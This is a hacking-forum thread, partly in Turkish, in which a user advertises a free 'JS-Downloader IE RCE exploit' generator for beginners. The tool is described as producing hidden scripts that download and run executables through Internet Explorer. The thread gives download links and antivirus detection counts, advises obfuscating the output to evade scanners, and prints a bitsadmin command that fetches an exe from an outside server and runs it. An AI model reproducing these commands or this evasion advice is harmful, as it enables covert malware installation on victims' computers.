Hoşgeldin Misafir

[FOR BEGINNERS] HACXX JS-DOWNLOADER IE RCE EXPLOIT 2021 - FREE DOWNLOAD

cunning

17 Mar 2020
1,263 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
HACXX-JS-DOWNLOADER-IE-RCE-EXPLOIT-2021.jpg


HACXX JS-DOWNLOADER IE RCE EXPLOIT 2021
- Is a js code generator that generate a hidden downloader script that remotely executes exes by exploiting Internet Explorer. To use just type your remote file location and local exe. Once the code is created save as a .js or embed with a html file using the tag script.

Download:
http://j.gs/FSZK
https://oxy.st/d/cQId

Virus Scan: (13/59 - For the generator)
https://www.virustotal.com/gui/file...1c343592b16acf47f6cf2c0b99a4a3ab601/detection

Virus Scan: (8/59 - For the exploit, use a obfuscator)
https://www.virustotal.com/gui/file...db3ac57e6cbaf7b59bcb45d5246f596bb8d/detection

NOTES:
- The code was made to work from a http server, if executing in IE locally a permission is required.
- One of the detections is JS.Trojan-Downloader.Agent.ob. Based on the virus report guaranties that it does exactly what is described.
 

cunning

17 Mar 2020
1,263 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
For the generator anyone can use the following command line...
Kod:
cmd.exe /c bitsadmin /transfer Kunami /download /priority high http://remoteserver.com/1.exe c:\windows\temp\1.exe & start c:\windows\temp\1.exe

(Works on older systems)